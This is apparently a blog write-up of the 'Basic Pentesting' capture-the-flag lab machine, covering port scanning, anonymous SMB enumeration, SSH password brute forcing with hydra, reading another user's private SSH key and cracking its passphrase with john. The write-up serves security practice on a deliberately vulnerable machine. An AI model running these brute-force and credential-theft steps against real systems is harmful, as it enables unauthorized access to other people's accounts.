This page looks best with JavaScript enabled

Basic Pentesting

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

This is a machine that allows you to practise web app hacking and privilege escalation

Recon

Nmap

nmap
Open ports:

22 - ssh
80 - web (Apache httpd 2.4.18 ((Ubuntu)))
139 - smb
445 - smb
8009 - ajp13 (Apache Jserv (Protocol v1.3))
8080 - Apache Tomcat 9.0.7 default page

Web

web
Source:
source

Dirsearch

dsearch
We got an interesting dir

Enum4linux

enum4linux

  • Anonymous login on smb

Smb

smbclient \\\\$IP\\Anonymous

mget staff.txt

We got the 2 users!

SSH

Cracking ssh pw

hydra -t 4 -l <user> -P ~/tools/wordlists/rockyou.txt ssh://$IP

hydra
We got the pw!

Getting in

ssh <user>@$IP

Just grab the other user2’s id_rsa from /home/<user2>/.ssh/id_rsa
We notice that this id_rsa is encrypted so we have to crack it!

Cracking the id_rsa

We use john here…

ssh2john id_rsa > hash
john --wordlist=rockyou.txt hash

We got the pw

Just ssh in with the id_rsa + the pw we got

ssh -i id_rsa <user2>@$IP

Got the final flag from ~/pass.bak

Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z